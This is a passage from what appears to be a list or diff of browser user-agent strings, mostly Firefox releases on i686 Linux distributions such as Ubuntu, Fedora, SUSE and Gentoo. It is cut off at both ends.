Mandriva/1.5.0.8-1.1mdv2007.0 (2007.0) Firefox/1.5.0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.8) Gecko/20060911 SUSE/1.5.0.8-0.2 Firefox/1.5.0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.8) Gecko/20061107 Fedora/1.5.0.8-1.fc6 Firefox/1.5.0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.8) Gecko/20061110 Firefox/1.5.0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.8) Gecko/20061115 Ubuntu/dapper-security Firefox/1.5.0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20060911 SUSE/1.5.0.9-0.2 Firefox/1.5.0.9 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20060911 SUSE/1.5.0.9-3.2 Firefox/1.5.0.9 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20061215 Red Hat/1.5.0.9-0.1.el4 Firefox/1.5.0.9 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20061219 Fedora/1.5.0.9-1.fc6 Firefox/1.5.0.9 pango-text +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20061221 Fedora/1.5.0.9-1.fc5 Firefox/1.5.0.9 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20070102 Ubuntu/dapper-security Firefox/1.5.0.9 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20070126 Ubuntu/dapper-security Firefox/1.5.0.9 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20070316 CentOS/1.5.0.9-10.el5.centos Firefox/1.5.0.9 pango-text +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20060601 Firefox/2.0.0.10 (Ubuntu-edgy) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20061201 Firefox/2.0.0.10 (Ubuntu-feisty) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20071015 SUSE/2.0.0.10-0.2 Firefox/2.0.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20071115 Firefox/2.0.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20071115 Firefox/2.0.0.10 (Debian-2.0.0.10-0etch1) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20071126 Ubuntu/7.10 (gutsy) Firefox/2.0.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20071128 Fedora/2.0.0.10-2.fc7 Firefox/2.0.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20071203 Ubuntu/7.10 (gutsy) Firefox/2.0.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20071213 Fedora/2.0.0.10-3.fc8 Firefox/2.0.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071204 Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071217 Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20080201 Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080129 Firefox/2.0.0.12 (Debian-2.0.0.12-0etch1) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12 Mnenhy/0.7.5.666 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080208 Fedora/2.0.0.12-1.fc8 Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080208 Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080208 Firefox/2.0b2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20061201 Firefox/2.0.0.13 (Ubuntu-feisty) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080316 SUSE/2.0.0.13-0.1 Firefox/2.0.0.13 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080316 SUSE/2.0.0.13-1.1 Firefox/2.0.0.13 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080325 Firefox/2.0.0.13 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080330 Ubuntu/7.10 (gutsy) Firefox/2.0.0.13 (Linux Mint) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20061201 Firefox/2.0.0.14 (Ubuntu-feisty) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080410 SUSE/2.0.0.14-0.4 Firefox/2.0.0.14 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080416 Fedora/2.0.0.14-1.fc8 Firefox/2.0.0.14 pango-text +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080417 Firefox/2.0.0.14 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080423 Firefox/2.0.0.14 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080428 Firefox/2.0.0.14 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080508 Ubuntu/8.04 (hardy) Firefox/2.0.0.14 (Linux Mint) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080525 Firefox/2.0.0.14 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.15) Gecko/20061201 Firefox/2.0.0.15 (Ubuntu-feisty) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.15) Gecko/20080702 Ubuntu/8.04 (hardy) Firefox/2.0.0.15 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080715 Fedora/2.0.0.16-1.fc8 Firefox/2.0.0.16 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080715 Firefox/2.0.0.16 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080715 Ubuntu/7.10 (gutsy) Firefox/2.0.0.16 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 Firefox/3.07 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080718 Ubuntu/8.04 (hardy) Firefox/2.0.0.16 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080722 Firefox/2.0.0.16 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080703 Mandriva/2.0.0.17-1.1mdv2008.1 (2008.1) Firefox/2.0.0.17 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080827 Firefox/2.0.0.10 (Debian-2.0.0.17-0etch1) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080921 SUSE/2.0.0.17-1.2 Firefox/2.0.0.17 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080922 Ubuntu/7.10 (gutsy) Firefox/2.0.0.17 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080924 Ubuntu/8.04 (hardy) Firefox/2.0.0.17 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.18) Gecko/20080921 SUSE/2.0.0.18-0.1 Firefox/2.0.0.18 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.18) Gecko/20081112 Fedora/2.0.0.18-1.fc8 Firefox/2.0.0.18 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.18) Gecko/20081113 Ubuntu/8.04 (hardy) Firefox/2.0.0.18 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081202 Firefox (Debian-2.0.0.19-0etch1) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081213 SUSE/2.0.0.19-0.1 Firefox/2.0.0.19 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081216 Fedora/2.0.0.19-1.fc8 Firefox/2.0.0.19 pango-text +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081230 Firefox/2.0.0.19 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20060601 Firefox/2.0.0.1 (Ubuntu-edgy) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Firefox/2.0.0.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Firefox/2.0.0.1 (Debian-2.0.0.1+dfsg-2) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061208 Firefox/2.0.0.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061220 Firefox/2.0.0.1 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20070110 Firefox/2.0.0.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20070224 Firefox/2.0.0.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.20) Gecko/20081217 Firefox(2.0.0.20) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.22pre) Gecko/20090327 Ubuntu/7.10 (gutsy) Firefox/2.0.0.22pre +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.22pre) Gecko/20090327 Ubuntu/8.04 (hardy) Firefox/2.0.0.22pre +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20061201 Firefox/2.0.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20061201 Firefox/2.0.0.2 (Ubuntu-feisty) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070221 SUSE/2.0.0.2-6.1 Firefox/2.0.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070225 Firefox/2.0.0.2 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070226 Firefox/2.0.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070314 Firefox/2.0.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070317 Firefox/2.0.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3) Gecko/20061201 Firefox/2.0.0.1 (Ubuntu-feisty) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3pre) Gecko/20070307 Firefox/2.0.0.3pre (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4 (Kubuntu) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070530 Fedora/2.0.0.4-1.fc7 Firefox/2.0.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070531 Firefox/2.0.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070531 Firefox/2.0.0.4 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070602 Firefox/2.0.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4pre) Gecko/20070509 Firefox/2.0.0.4pre (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20061201 Firefox/2.0.0.5 (Ubuntu-feisty) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20070718 Fedora/2.0.0.5-1.fc7 Firefox/2.0.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20070719 Firefox/2.0.0.5 (Debian-2.0.0.5-0etch1) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20070725 Firefox/2.0.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20070728 Firefox/2.0.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20070804 Firefox/2.0.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20070807 Firefox/2.0.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20070831 Firefox/2.0.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7 (Ubuntu-feisty) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.7) Gecko/20070921 Firefox/2.0.0.7 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.7) Gecko/20070923 Firefox/2.0.0.7 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20061201 Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Firefox/2.0.0.8 (Debian-2.0.0.8-1) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071008 FreeBSD/i386 Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071019 Fedora/2.0.0.8-1.fc7 Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071022 Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071201 Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/1.5.0.9 (Debian-2.0.0.9-2) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.9) Gecko/20071025 FreeBSD/i386 Firefox/2.0.0.9 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.9) Gecko/20071103 Firefox/2.0.0.9 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.9) Gecko/20071103 Firefox/2.0.0.9 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.9) Gecko/20071105 Fedora/2.0.0.9-1.fc7 Firefox/2.0.0.9 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.9) Gecko/20071105 Firefox/2.0.0.9 +Mozilla/5.0 (X11; U; Linux i686; en_US; rv:1.8.1b1) Gecko/20060813 Firefox/2.0b1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061001 Firefox/2.0b (Swiftfox) +Mozilla/5.0 (X11;U;Linux i686;en-US;rv:1.8.1) Gecko/2006101022 Firefox/2.0 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b5) Gecko/20051008 Fedora/1.5-0.5.0.beta2 Firefox/1.4.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20060110 Debian/1.5.dfsg-4 Firefox/1.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20060111 Firefox/1.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20060118 Firefox/1.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20060119 Debian/1.5.dfsg-4ubuntu3 Firefox/1.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20060130 Ubuntu/1.5.dfsg-4ubuntu6 Firefox/1.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20060806 Firefox/1.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042513 Linux Mint/5 (Elyssa) Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Linux Mint/6 (Felicia) Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Linux Mint/7 (Gloria) Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042708 Fedora/3.0.10-1.fc10 Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042812 Gentoo Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060308 Linux Mint/7 (Gloria) Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060310 Linux Mint/6 (Felicia) Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070610 Firefox/3.0.12 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070812 Linux Mint/5 (Elyssa) Firefox/3.0.12 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070818 Firefox/3.0.12 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.12) Gecko/2009070818 Ubuntu/8.10 (intrepid) Firefox/3.0.12 FirePHP/0.3 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14 GTB5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090905 Fedora/3.0.14-1.fc10 Firefox/3.0.14 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009091010 Firefox/3.0.14 (Debian-3.0.14-1) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/20090916 Ubuntu/9.04 (jaunty) Firefox/3.0.14 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.17) Gecko/2010010604 Ubuntu/9.04 (jaunty) Firefox/3.0.17 FirePHP/0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.19) Gecko/2010072023 Firefox/3.0.6 (Debian-3.0.6-3) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.19) Gecko/2010091807 Firefox/3.0.6 (Debian-3.0.6-3) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1pre) Gecko/2008062222 Firefox/3.0.1pre (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008091816 Red Hat/3.0.2-3.el5 Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092000 Ubuntu/8.04 (hardy) Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/1.4.0 (hardy) Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.1.6 +Mozilla/5.0 (X11; U; Linux i686; en-us; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092318 Fedora/3.0.2-1.fc9 Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092418 CentOS/3.0.2-3.el5.centos Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092809 Gentoo Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008110715 ASPLinux/3.0.2-3.0.120asp Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008100320 Firefox/2.0.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3pre) Gecko/2008090713 Firefox/3.0.3pre (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.10 (intrepid) Firefox/3.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4pre) Gecko/2008101311 Firefox/3.0.4pre (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121622 Linux Mint/6 (Felicia) Firefox/3.0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121718 Gentoo Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121914 Ubuntu/8.04 (hardy) Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2009011301 Gentoo Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009012700 SUSE/3.0.6-0.1 Firefox/3.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020410 Fedora/3.0.6-1.fc10 Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020410 Fedora/3.0.6-1.fc9 Firefox/3.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020518 Ubuntu/9.04 (jaunty) Firefox/3.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020616 Gentoo Firefox/3.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.04 (hardy) Firefox/3.0.6 FirePHP/0.2.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009022111 Gentoo Firefox/3.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009022714 Ubuntu/9.04 (jaunty) Firefox/3.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.7) Gecko/2009032018 Firefox/3.0.4 (Debian-3.0.6-1) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009040820 Firefox/3.0.9 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009041408 Red Hat/3.0.9-1.el5 Firefox/3.0.9 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009042113 Linux Mint/6 (Felicia) Firefox/3.0.9 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9 GTB5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Firefox/11.0 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Slackware/13.0 Firefox/3.5.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2pre) Gecko/20090729 Ubuntu/9.04 (jaunty) Firefox/3.5.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090912 Gentoo Firefox/3.5.3 FirePHP/0.3 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090919 Firefox/3.5.3 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.4) Gecko/20091028 Ubuntu/9.10 (karmic) Firefox/3.5.9 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.6) Gecko/20100118 Gentoo Firefox/3.5.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100315 Ubuntu/9.10 (karmic) Firefox/3.5.9 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100401 Ubuntu/9.10 (karmic) Firefox/3.5.9 GTB7.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1b3) Gecko/20090407 Firefox/3.1b3 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1) Gecko/20090701 Ubuntu/9.04 (jaunty) Firefox/3.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20100915 Ubuntu/9.04 (jaunty) Firefox/3.6.10 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10pre) Gecko/20100902 Ubuntu/9.10 (karmic) Firefox/3.6.1pre +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101114 Gentoo Firefox/3.6.12 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.14pre) Gecko/20110105 Firefox/3.6.14pre +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.15) Gecko/20110303 Ubuntu/10.04 (lucid) Firefox/3.6.15 FirePHP/0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.16) Gecko/20110323 Ubuntu/9.10 (karmic) Firefox/3.6.16 FirePHP/0.5 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.16pre) Gecko/20110304 Ubuntu/10.10 (maverick) Firefox/3.6.15pre +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.1) Gecko/20100122 firefox/3.6.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.3 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100312 Ubuntu/9.04 (jaunty) Firefox/3.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100404 Ubuntu/10.04 (lucid) Firefox/3.6.3 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.4) Gecko/20100625 Gentoo Firefox/3.6.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.7) Gecko/20100726 CentOS/3.6-3.el5.centos Firefox/3.6.7 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.8) Gecko/20100727 Firefox/3.6.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.9) Gecko/20100827 Red Hat/3.6.9-2.el6 Firefox/3.6.9 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 FirePHP/0.4 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Ubuntu/10.04 (lucid) Firefox/3.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100128 Gentoo Firefox/3.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; 